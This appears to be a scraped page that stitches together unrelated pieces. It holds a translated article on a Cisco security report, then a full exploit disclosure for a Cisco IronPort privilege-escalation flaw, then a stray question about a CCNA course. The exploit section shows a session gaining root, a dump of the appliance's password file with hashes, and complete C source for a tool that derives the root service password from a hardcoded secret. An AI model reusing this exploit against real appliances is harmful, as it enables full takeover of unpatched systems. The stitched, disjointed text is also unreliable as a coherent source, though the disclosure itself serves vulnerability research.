Worse still, many companies do not keep up with technology when it comes to reacting to IT threats. Many companies have a single person on IT, but no people specialised in information security. One problem in large companies had to do with employees bringing "infected" USB sticks from home and, without realising it, introducing malware into the company network. USB sticks are no longer such a problem, but smartphones are, says the head of Cisco Romania.

"USB sticks are used less and less because all employees have these marvels of technology called smartphones. I want to point out that people are aware of the dangers related to sticks, but the same has to happen with the smartphone. A stick goes into a computer, whereas a smartphone also has radio access, that is, wireless, and in that case the damage can be far greater than with a simple stick. (...) The smartphone has processing power and can also communicate with the outside world; the stick only puts something on the computer."

Key trends presented in the report:

Trends exploiting website vulnerabilities: looking closely at everything that happened in security over the past year, the research team observed the following:
- A massive decrease in Java exploits (34%), as security was improved
- A significant increase in Silverlight attacks, of over 200%, although it is still a small volume of attacks
- Attacks exploiting Flash (down 3%) and PDF (down 7%) vulnerabilities remain at roughly the same level.

"From a security point of view we will see many changes in the coming period. The IT security industry will transition from a preventive approach to one that takes into account all phases of an attack: before, during and after it has taken place. Companies will also be able to use the Internet of Everything to their advantage when it comes to fighting cybercrime. Billions of connected devices will generate a great deal of information that can be used to improve security," says Dorin Pena, General Manager of Cisco Romania.

Here are the study's conclusions:

Exploit kits: an 88% decrease from May to December. But even with this decrease, numerous security breaches are occurring at an alarming rate.

Flash and JavaScript, a new combination: Flash malware can now interact with the JavaScript programming language to hide malicious activity by spreading the vulnerabilities across two different files: one Flash, the other JavaScript. These types of attacks thus become much harder to detect and analyse, which shows the attackers' level of professionalism and sophistication.

Malware attacks: The pharmaceutical and chemical industries recorded the highest number of malware attacks over the past year, and the media, manufacturing, and land, sea and air transport industries are in the top 5 segments most affected by these types of attacks. Attackers' targets span different verticals; only the air transport, pharmaceutical and chemical industries remain in the top 5 compared to last year.

Spam used as a means of phishing: Although down from the records reached a few years ago, spam volumes grew by 250% from January to November 2014. Snowshoe spam, which involves sending small volumes of spam from many IP addresses to evade detection, is on the rise. Malicious actors often steal valid email credentials with the help of spam messages and then send such messages using real addresses. Spammers transform messages to evade detection, sending spam hidden in attractive messages so as to ensure a high open rate. The messages are varied to evade spam filters. For example, 95 different variants of the same message were identified.

Vulnerabilities: Adobe and Internet Explorer are the main points of attack, Adobe being involved in 19% of the attacks observed and Internet Explorer in 31%.

Individual users and IT teams: As security technologies evolve, direct attacks become harder and harder to carry out, so convincing the user to install malware, or exploiting the gaps between security teams' intentions and their actions, are becoming increasingly widespread ways of compromising security. And this is aggravated by many companies still using old software with very well-known vulnerabilities. Heartbleed, for example, was discovered about 12 months ago and had a very large impact, in that it revealed a way to exploit the OpenSSL encryption library. At the same time, 56% of all OpenSSL versions are older than 56 months and are still vulnerable because they have not been updated in recent months.

Browser: Internet Explorer is the browser least updated by its users; only about 10% of update requests come from users who have the latest version of IE, while the most-used version is at least 31 months older than the latest release. Unlike Internet Explorer, 64% of Chrome update requests come from the latest version of that browser.

Malvertising: Cybercriminals use the free premium software model, similar in legitimacy to the tactic of offering software for free and then charging for the use of additional functions. In this case, we are talking about a sophisticated technique that targets several malware distribution channels. It involves collecting money from many individual users, in small amounts, by permanently infecting their browsers.

"Companies give you an application for free, you install it and either you receive various questionnaires to fill in or, and this is more difficult, you get all sorts of advertising banners. Beneath these advertising banners we have observed an increase in cyber attacks (...) More and more companies are effectively selling online advertising, and this is also happening on mobile devices (...) Consider that more and more bank payments are made from the same mobile devices that use free advertising-supported applications," explains Dorin Pena, head of Cisco Romania.

Changing the perception of cybersecurity: from individual users to large corporations

Cisco's security experts believe it is time for companies to take a new approach to cybersecurity. The strategies include much more sophisticated security controls for better protection across the entire spectrum of attacks: before, during and after they have taken place.

The Cisco security report, now in its eighth edition, contains the latest research by Cisco experts on the IT security industry, presents companies with the newest and most important trends in cybersecurity, and provides information on how criminals try to get past protection systems. The report includes the main conclusions of Cisco's most recent security study (Security Capabilities Benchmark Study), conducted on 1,700 companies in nine countries. Its purpose was to determine how prepared companies are for these types of attacks.

According to the study's conclusions, 75% of the managers responsible for their companies' IT security consider the security tools they use to be very effective. However, fewer than 50% of respondents use standard tools, such as patching and configuration, to prevent security breaches. In addition, cybersecurity problems are amplified by attackers' geopolitical motivations and by the requirements of local laws regarding data sovereignty, localisation and encryption.

Source 1  Source 2
14. /*
Cisco Ironport Appliances Privilege Escalation Vulnerability

Vendor: Cisco
Product webpage: http://www.cisco.com
Affected version(s):
  Cisco Ironport ESA - AsyncOS 8.5.5-280
  Cisco Ironport WSA - AsyncOS 8.0.5-075
  Cisco Ironport SMA - AsyncOS 8.3.6-0
Date: 22/05/2014
Credits: Glafkos Charalambous
CVE: Not assigned by Cisco

Disclosure Timeline:
19-05-2014: Vendor Notification
20-05-2014: Vendor Response/Feedback
27-08-2014: Vendor Fix/Patch
24-01-2015: Public Disclosure

Description:
Cisco Ironport appliances are vulnerable to authenticated "admin" privilege escalation. Enabling the Service Account from the GUI or CLI allows an admin to gain root access on the appliance, therefore bypassing all existing "admin" account limitations. The vulnerability is due to a weak algorithm implementation in the password generation process which is used by Cisco to remotely access the appliance to provide technical support.

Vendor Response:
As anticipated, this is not considered a vulnerability but a security hardening issue. As such we did not assign a CVE; however, I made sure that this is fixed on SMA, ESA and WSA. The fix included several changes such as protecting the algorithm better in the binary, changing the algorithm itself to be more robust and enforcing password complexity when the administrator sets the pass-phrase and enables the account.

[SD] Note: Administrative credentials are needed in order to activate the access to the support representative and to set up the pass-phrase that is used to compute the final password.

[GC] Still, the Admin user has limited permissions on the appliance and credentials can get compromised too, even with the default password, leading to full root access.

[SD] This issue is tracked for the ESA by Cisco bug id CSCuo96011, for the SMA by Cisco bug id CSCuo96056 and for the WSA by Cisco bug id CSCuo90528.

Technical Details:
By logging in to the appliance using the default password "ironport" or a user specified one, there is an option to enable Customer Support Remote Access. This option can be found under Help and Support -> Remote Access on the GUI or by using the CLI console account "enablediag" and issuing the command service. Enabling this service requires a temporary user password which should be provided along with the appliance serial number to Cisco techsupport for remotely connecting and authenticating to the appliance. Having a temporary password and the serial number of the appliance by enabling the service account, an attacker can in turn get full root access as well as potentially damage it, backdoor it, etc.

PoC:

Enable Service Account
----------------------
root@kali:~# ssh -lenablediag 192.168.0.158
Password:
Last login: Sat Jan 24 15:47:07 2015 from 192.168.0.163
Copyright (c) 2001-2013, Cisco Systems, Inc.
AsyncOS 8.5.5 for Cisco C100V build 280
Welcome to the Cisco C100V Email Security Virtual Appliance

Available Commands:
help     -- View this text.
quit     -- Log out.
service  -- Enable or disable access to the service system.
network  -- Perform emergency configuration of the diagnostic network interface.
clearnet -- Resets configuration of the diagnostic network interface.
ssh      -- Configure emergency SSH daemon on the diagnostic network interface.
clearssh -- Stop emergency SSH daemon on the diagnostic network interface.
tunnel   -- Start up tech support tunnel to IronPort.
print    -- Print status of the diagnostic network interface.
reboot   -- Reboot the appliance.

S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
Service Access currently disabled.
ironport.example.com> service
Service Access is currently disabled.
Enabling this system will allow an IronPort Customer Support representative to remotely access your system to assist you in solving your technical issues.
Are you sure you want to do this? [Y/N]> Y
Enter a temporary password for customer support to use. This password may not be the same as your admin password. This password will not be able to be used to directly access your system.
[]> cisco123
Service access has been ENABLED. Please provide your temporary password to your IronPort Customer Support representative.
S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
Service Access currently ENABLED (0 current service logins)
ironport.example.com>

Generate Service Account Password
---------------------------------
Y:\Vulnerabilities\cisco\ironport>woofwoof.exe

Usage: woofwoof.exe -p password -s serial
 -p <password> | Cisco Service Temp Password
 -s <serial>   | Cisco Serial Number
 -h            | This Help Menu

 Example: woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4

Y:\Vulnerabilities\cisco\ironport>woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4
Service Password: b213c9a4

Login to the appliance as Service account with root privileges
--------------------------------------------------------------
root@kali:~# ssh -lservice 192.168.0.158
Password:
Last login: Wed Dec 17 21:15:24 2014 from 192.168.0.10
Copyright (c) 2001-2013, Cisco Systems, Inc.
AsyncOS 8.5.5 for Cisco C100V build 280
Welcome to the Cisco C100V Email Security Virtual Appliance
# uname -a
FreeBSD ironport.example.com 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Fri Mar 14 08:04:05 PDT 2014 auto-build@vm30esa0109.ibeng:/usr/build/iproot/freebsd/mods/src/sys/amd64/compile/MESSAGING_GATEWAY.amd64 amd64
# cat /etc/master.passwd
# $Header: //prod/phoebe-8-5-5-br/sam/freebsd/install/dist/etc/master.passwd#1 $
root:*:0:0::0:0:Mr &:/root:/sbin/nologin
service:$1$bYeV53ke$Q7hVZA5heeb4fC1DN9dsK/:0:0::0:0:Mr &:/root:/bin/sh
enablediag:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:999:999::0:0:Administrator support access control:/root:/data/bin/enablediag.sh
adminpassword:$1$aDeitl0/$BlmzKUSeRXoc4kcuGzuSP/:0:1000::0:0:Administrator Password Tool:/data/home/admin:/data/bin/adminpassword.sh
daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5::0:0:System &:/:/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source,,,:/:/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin
support:$1$FgFVb064$SmsZv/ez7Pf4wJLp5830s/:666:666::0:0:Mr &:/root:/sbin/nologin
admin:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:1000:1000::0:0:Administrator:/data/home/admin:/data/bin/cli.sh
clustercomm:*:900:1005::0:0:Cluster Communication User:/data/home/clustercomm:/data/bin/command_proxy.sh
smaduser:*:901:1007::0:0:Smad User:/data/home/smaduser:/data/bin/cli.sh
spamd:*:783:1006::0:0:CASE User:/usr/case:/sbin/nologin
pgsql:*:70:70::0:0:PostgreSQL pseudo-user:/usr/local/pgsql:/bin/sh
ldap:*:389:389::0:0:OpenLDAP Server:/nonexistent:/sbin/nologin
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include "md5.h"
#include "getopt.h"

#define MAX_BUFFER 128
#define SECRET_PASS "woofwoof"

void usage(char *name);
void to_lower(char *str);
void fuzz_string(char *str);

int main(int argc, char *argv[])
{
    if (argc < 2) {
        usage(argv[0]);
    }

    int opt;
    int index;
    char *temp_pass = { 0 };
    char *serial_no = { 0 };
    char *secret_pass = SECRET_PASS;
    char service[MAX_BUFFER] = { 0 };
    unsigned char digest[16] = { 0 };

    while ((opt = getopt(argc, argv, "p:s:h")) != -1) {
        switch (opt) {
        case 'p':
            temp_pass = optarg;
            break;
        case 's':
            serial_no = optarg;
            break;
        case 'h':
            usage(argv[0]);
            break;
        default:
            printf_s("Wrong Argument: %s\n", argv[1]);
            break;
        }
    }

    for (index = optind; index < argc; index++) {
        usage(argv[0]);
        exit(0);
    }

    if (temp_pass == NULL || serial_no == NULL) {
        usage(argv[0]);
        exit(0);
    }

    if ((strlen(temp_pass) <= sizeof(service)) && (strlen(serial_no) <= sizeof(service))) {
        to_lower(serial_no);
        fuzz_string(temp_pass);
        strcpy_s(service, sizeof(service), temp_pass);
        strcat_s(service, sizeof(service), serial_no);
        strcat_s(service, sizeof(service), secret_pass);

        MD5_CTX context;
        MD5_Init(&context);
        MD5_Update(&context, service, strlen(service));
        MD5_Final(digest, &context);

        printf_s("Service Password: ");
        for (int i = 0; i < sizeof(digest) - 12; i++)
            printf("%02x", digest[i]);
    }

    return 0;
}

void fuzz_string(char *str)
{
    while (*str) {
        switch (*str) {
        case '1': *str = 'i'; break;
        case '0': *str = 'o'; break;
        case '_': *str = '-'; break;
        }
        str++;
    }
}

void to_lower(char *str)
{
    while (*str) {
        if (*str >= 'A' && *str <= 'Z') {
            *str += 0x20;
        }
        str++;
    }
}

void usage(char *name)
{
    printf_s("\nUsage: %s -p password -s serial\n", name);
    printf_s(" -p <password> | Cisco Service Temp Password\n");
    printf_s(" -s <serial>   | Cisco Serial Number\n");
    printf_s(" -h            | This Help Menu\n");
    printf_s("\n Example: %s -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4\n", name);
    exit(0);
}

Source
15. CCNA (Cisco Certified Network Associate): I have been following this course for 2 months and would like your opinion, because I don't know whether it is a good first step.